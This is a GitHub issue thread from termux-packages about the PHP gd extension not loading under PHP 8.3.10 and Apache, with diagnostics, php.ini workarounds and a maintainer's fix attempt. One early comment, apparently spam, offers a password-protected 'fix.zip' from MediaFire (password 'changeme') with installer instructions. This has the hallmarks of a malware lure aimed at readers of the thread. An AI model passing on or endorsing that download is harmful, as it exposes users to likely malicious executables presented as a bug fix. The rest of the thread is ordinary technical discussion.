### ISSUE TITLE
[Bug]: php gd error

### ISSUE THREAD

**Issue by baturax** [termux/termux-packages#21262]
### Problem description

İ installed php and phpgd and when i run next cloud it says gd not installed
İ still can use an old version of nextcloud with php7.

### What steps will reproduce the bug?

Running php

### What is the expected behavior?

Working well like php7

### System information

```shell
Termux Variables:
TERMUX_APK_RELEASE=GITHUB
TERMUX_APP_PACKAGE_MANAGER=apt
TERMUX_APP_PID=8747
TERMUX_IS_DEBUGGABLE_BUILD=1
TERMUX_MAIN_PACKAGE_FORMAT=debian
TERMUX_VERSION=0.118.1
TERMUX__USER_ID=0
Packages CPU architecture:
aarch64
Subscribed repositories:
# sources.list
deb https://grimler.se/termux/termux-main stable main
# tur-repo (sources.list.d/tur.list)
deb https://tur.kcubeterm.com tur-packages tur tur-on-device tur-continuous
Updatable packages:
All packages up to date
termux-tools version:                                                                                                                                                                                                       1.43.4
Android version:
14                                                                                                                                                                                                                          Kernel build information:
Linux localhost 4.14.350-Cryo/deca56cd #3 SMP PREEMPT Fri Aug 9 17:41:41 BST 2024 aarch64 Android                                                                                                                           Device manufacturer:
Xiaomi
Device model:                                                                                                                                                                                                               Redmi Note 8
LD Variables:                                                                                                                                                                                                               LD_LIBRARY_PATH=
LD_PRELOAD=/data/data/com.termux/files/usr/lib/libtermux-exec.so
Installed termux plugins:
com.termux.boot versionCode:1000
```

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Biswa96** [comment]
Could you provide any simple minimal steps to reproduce the issue?

**Comment by Baturax** [comment]
> Could you provide any simple minimal steps to reproduce the issue? Answering my own question: `php -m` lists all the modules.

p~ $ php -m
[PHP Modules]
bcmath
bz2
calendar
Core
ctype
curl
date
dom
exif
FFI
fileinfo
filter
gmp
hash
iconv
intl
json
libxml
mbstring
mysqli
mysqlnd
openssl
pcntl
pcre
PDO
pdo_mysql
pdo_sqlite
Phar
posix
random
readline
Reflection
session
SimpleXML
sockets
SPL
sqlite3
standard
tidy
tokenizer
xml
xmlreader
xmlwriter
xsl
zip
zlib

**Comment by Baturax** [comment]
any idea?

**Comment by freebrowser1** [comment]
Same issue here.
I had nextcloud working and now it does not work anymore.
Other apps using gd don't work anymore.
`apt list --installed | grep php` does list gd however.
```
Nothing 2a:.../usr/lib$ apt list --installed | grep php

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

php-apache/stable,now 8.3.10 aarch64 [installed]
**php-gd/stable,now 8.3.10 aarch64 [installed]**
php/stable,now 8.3.10 aarch64 [installed]
```

**Comment by fornwall** [comment]
I think that after https://github.com/termux/termux-packages/pull/21072 the `gd` extension needs to be enabled explicitly by specifying `extension=gd` in `$PREFIX/lib/php.ini` (that file needs to be created if it does not exist).

After doing that, `php -m` shows the `gd` module, and some example php scripts using `gd` works.

Don't know much about how php is normally packaged, but having a peek at how it works in ubuntu we should probably setup so that php automatically loads a `gd.ini` file (or similar) with `extension=gd.so` once the `php-gd` package is installed.

**Comment by Biswa96** [comment]
> the `gd` extension needs to be enabled explicitly by specifying `extension=gd` in `$PREFIX/lib/php.ini` (that file needs to be created if it does not exist).

If `extension=gd` is specified in php.ini file and php-gd is not installed, `php -m` shows a big warning.

> we should probably setup so that php automatically loads a `gd.ini` file (or similar) with `extension=gd.so` once the `php-gd` package is installed.

Alpine Linux does the same. I'm exploring it.

**Comment by freebrowser1** [comment]
I added the line `extension=gd.so` to php.ini and `php -m` now does show gd.
And `php -r 'var_dump(gd_info());'` shows:
```
array(15) {
  ["GD Version"]=>
  string(5) "2.3.3"
  ["FreeType Support"]=>
  bool(true)
  ["FreeType Linkage"]=>
  string(13) "with freetype"
  ["GIF Read Support"]=>
  bool(true)
  ["GIF Create Support"]=>
  bool(true)
  ["JPEG Support"]=>
  bool(true)
  ["PNG Support"]=>
  bool(true)
  ["WBMP Support"]=>
  bool(true)
  ["XPM Support"]=>
  bool(false)
  ["XBM Support"]=>
  bool(true)
  ["WebP Support"]=>
  bool(true)
  ["BMP Support"]=>
  bool(true)
  ["AVIF Support"]=>
  bool(true)
  ["TGA Read Support"]=>
  bool(true)
  ["JIS-mapped Japanese Font Support"]=>
  bool(false)
}
```
so it IS installed.
And phpinfo() also shows it:
```
PHP Version => 8.3.10

System => Linux localhost 5.15.104-android13-8-00001-gac1072c849eb-ab10753874 #1 SMP PREEMPT Fri Sep 1 23:16:48 UTC 2023 aarch64
Build Date => Aug  8 2024 05:08:24
Build System => Linux e0fc9f326c9b 6.5.0-1025-azure #26~22.04.1-Ubuntu SMP Thu Jul 11 22:33:04 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
Configure Command =>  '/home/builder/.termux-build/php/src/configure'  '--disable-dependency-tracking' '--prefix=/data/data/com.termux/files/usr' '--libdir=/data/data/com.termux/files/us
r/lib' '--disable-rpath' '--disable-rpath-hack' '--host=aarch64-linux-android' 'ac_cv_func_res_nsearch=no' 'ac_cv_phpdbg_userfaultfd_writefault=no' 'php_cv_lib_gd_gdImageCreateFromPng=ye
s' 'php_cv_lib_gd_gdImageCreateFromAvif=yes' 'php_cv_lib_gd_gdImageCreateFromWebp=yes' 'php_cv_lib_gd_gdImageCreateFromJpeg=yes' 'php_cv_lib_gd_gdImageCreateFromBmp=yes' 'php_cv_lib_gd_g
dImageCreateFromTga=yes' '--enable-bcmath' '--enable-calendar' '--enable-exif' '--enable-mbstring' '--enable-opcache' '--enable-pcntl' '--enable-sockets' '--mandir=/data/data/com.termux/
files/usr/share/man' '--with-bz2=/data/data/com.termux/files/usr' '--with-curl=/data/data/com.termux/files/usr' '--with-ldap=shared,/data/data/com.termux/files/usr' '--with-ldap-sasl' '-
-with-openssl=/data/data/com.termux/files/usr' '--with-readline=/data/data/com.termux/files/usr' '--with-sodium=shared,/data/data/com.termux/files/usr' '--with-iconv-dir=/data/data/com.t
ermux/files/usr' '--with-zlib' '--with-pgsql=shared,/data/data/com.termux/files/usr' '--with-pdo-pgsql=shared,/data/data/com.termux/files/usr' '--with-mysqli=mysqlnd' '--with-pdo-mysql=m
ysqlnd' '--with-mysql-sock=/data/data/com.termux/files/usr/tmp/mysqld.sock' '--with-apxs2=/home/builder/.termux-build/php/tmp/apxs-wrapper.sh' '--with-iconv=/data/data/com.termux/files/u
sr' '--enable-fpm' '--enable-gd=shared,/data/data/com.termux/files/usr' '--with-external-gd' '--with-external-pcre' '--with-zip' '--with-xsl' '--with-gmp' '--with-ffi' '--with-tidy=/data
/data/com.termux/files/usr' '--enable-intl' '--sbindir=/data/data/com.termux/files/usr/bin' '--disable-nls' '--enable-shared' '--enable-static' '--libexecdir=/data/data/com.termux/files/
usr/libexec' 'host_alias=aarch64-linux-android' 'PKG_CONFIG=/home/builder/.termux-build/_cache/android-r27-api-24-v0/bin/pkg-config' 'PKG_CONFIG_LIBDIR=/data/data/com.termux/files/usr/li
b/pkgconfig:/data/data/com.termux/files/usr/share/pkgconfig' 'CPP=aarch64-linux-android-cpp'
Server API => Command Line Interface
Virtual Directory Support => disabled
```
But with Apache it does NOT work.
I obviously kicked apache by `sv stop httpd` followed by `sv start httpd` before opening a webp[age requiring gd, but still to no avail, as phpinfo() run from a script on a webpage does not show gd, while it is included.

**Comment by freebrowser1** [comment]
why is this ticket closed ?

**Comment by freebrowser1** [comment]
In the phpinfo() as I stated above I see 
--enable-gd=shared
--with-external-gd
but not --with-gd
Is it properly built ?

**Comment by TomJo2000** [comment]
- `php-gd` was split out into a separate subpackage a while ago,
https://github.com/termux/termux-packages/pull/21072
this is also done by Arch, Cygwin, Nixpkgs, or Void Linux.

Please ensure you also have the `php-gd` package installed.

**Comment by Baturax** [comment]
Since other distros have already done so, it would be good if it stayed like that

**Comment by Baturax** [comment]
> I think that after #21072 the `gd` extension needs to be enabled explicitly by specifying `extension=gd` in `$PREFIX/lib/php.ini` (that file needs to be created if it does not exist).
> 
> After doing that, `php -m` shows the `gd` module, and some example php scripts using `gd` works.
> 
> Don't know much about how php is normally packaged, but having a peek at how it works in ubuntu we should probably setup so that php automatically loads a `gd.ini` file (or similar) with `extension=gd.so` once the `php-gd` package is installed.

**Comment by Biswa96** [comment]
The issue has not been fixed yet.

**Comment by freebrowser1** [comment]
I tried a gd.ini in the same folder as php.ini `$(PREFIX)/user/lib` with just a line `extension=gd.so`, but to no avail (i.e. `php -m' did show gd, but not in phpinfo() under Apache.

**Comment by Baturax** [comment]
> I tried a gd.ini in the same folder as php.ini `$(PREFIX)/user/lib` with just a line `extension=gd.so`, but to no avail (i.e. `php -m` did show gd, but not in `phpinfo();` under Apache). I hope this will be fixed soon, as many webpages / web interfaces require gd.

You should add to $PREFIX/lib/php.ini
Like vim $PREFIX/lib/php.ini

**Comment by Biswa96** [comment]
I have added a pull request to fix this issue. Would you like to test the packages from GitHub Actions artifacts of that pull request? Link https://github.com/termux/termux-packages/actions/runs/10609522011

As I explained in https://github.com/termux/termux-packages/issues/21262#issuecomment-2314842020, I copied the behavior from Alpine Linux. As a user, you do not have to add or edit any file. You just install php and php-gd. Then php loads the extensions from files in `$PREFIX/etc/php/conf.d`. For example, php-gd has gd.ini.

Now I have to add those ini files for other php extensions as well ⏳

**Comment by freebrowser1** [comment]
So what should I do now to get it working ? 
I have installed php and php-gd and enabled `extension=gd.so` in php.ini.
But there is no `$PREFIX/etc/php` folder on my system. Should I create that folder and create the subfolder `conf.d` inside it ? And what should I put into that folder ?
Should I update (`pkg update && pkg upgrade`) to update php ?

**Comment by Biswa96** [comment]
> So what should I do now to get it working ?

If you do not know how to test packages from CI artifacts, then just wait for the pull request to be merged.

**Comment by freebrowser1** [comment]
Well, I saw that there was a zip inside it with many deb files.
So can I install these with `dpkg -i <debfile>` ?

**Comment by Biswa96** [comment]
The above workarounds with php.ini are not required and can be removed now.

**Comment by freebrowser1** [comment]
Well I just installed the patched dpkg modules, restarted Apache, but gd is still not loaded under Apache.

**Comment by Biswa96** [comment]
This issue is about php and I have not look into apache. Please provide some info about expected and current output.

**Comment by Biswa96** [comment]
If I run `php -r 'phpinfo();'` command it shows gd.

**Comment by freebrowser1** [comment]
Exactly that did it for me too, when run standalone. 
But most websites use Apache and many of them are useless without gd.

Can this issue be fixed by reverting to including compiling gd into php just as it was in php 8.3.8 and earlier ?

**Comment by freebrowser1** [comment]
> I am not familiar with web dev stuff and do not know how to setup that. Just provide the commands to reproduce it and I will run.

To reproduce, install php and Apache:
`pkg install php apache2  php-apache php-gd`
and copy attached httpd.conf into `$PREFIX/etc/apache2` over existing httpd.conf for loading php into apache:
[httpd.conf.zip](https://github.com/user-attachments/files/16802528/httpd.conf.zip)
and add a file `/data/data/com.termux/files/usr/share/apache2/default-site/htdocs/phpinfo.php` with contents `<?php phpinfo(); ` and then load in the browser on the device `http://localhost:8080/phpinfo.php`.
This shows all loaded modules but no gd.

**Comment by freebrowser1** [comment]
No reaction yet ?
Why not reverting to a php binary with an included gd library just as before ?

**Comment by Biswa96** [comment]
The underlying issue is related to rpath. If you want to load php modules with apache, add this workaround `patchelf --add-needed libphp.so $PREFIX/lib/php/gd.so`. After adding that workaround, `php -m` will not load gd module.

**Comment by freebrowser1** [comment]
So things are even worse.
I tried on my test device (Android emulator) and saw indeed that `patchelf --add-needed libphp.so $PREFIX/lib/php/gd.so` disabled gd from `php -m`.
And it still did not work under Apache.
But after removing gd.so from that folder `php -m` still did not show gd.

How can this be fixed that gd works under Apache as before ?

**Comment by Biswa96** [comment]
I've already told its a rpath issue and can't figure out any solution yet.

**Comment by freebrowser1** [comment]
So why not revert to the old situation as php 8.3.8 where it did work as before ?
The (in the first impression minor) update from 8.3.8 => 8.3.10 suddenly disabled gd.

**Comment by Biswa96** [comment]
> So why not revert to the old situation as php 8.3.8 where it did work as before ?

There was an issue to split gd dependencies from php #21068

**Comment by twaik** [comment]
Official language of all termux spaces is English. We do not offer support in other languages.

**Comment by kakatoji** [comment]
![Image](https://github.com/user-attachments/assets/67131dd2-d76e-40bf-8d7b-291c4a2d272a)
I removed or changed it, if I need gd in termux, termux already has the default because php in termux does not have a php.ini file

solved.

**Comment by freebrowser1** [comment]
When I run PHP from the terminal it says 'gd' is not loaded, but from the web server (Apache) it is loaded. Hence I can run nextcloud server on Termux without problems as it requires gd and sodium. Both don't run in a terminal, so I cannot convert the database of Nextcloud from sqlite to MySQL which uses a script run from a terminal.
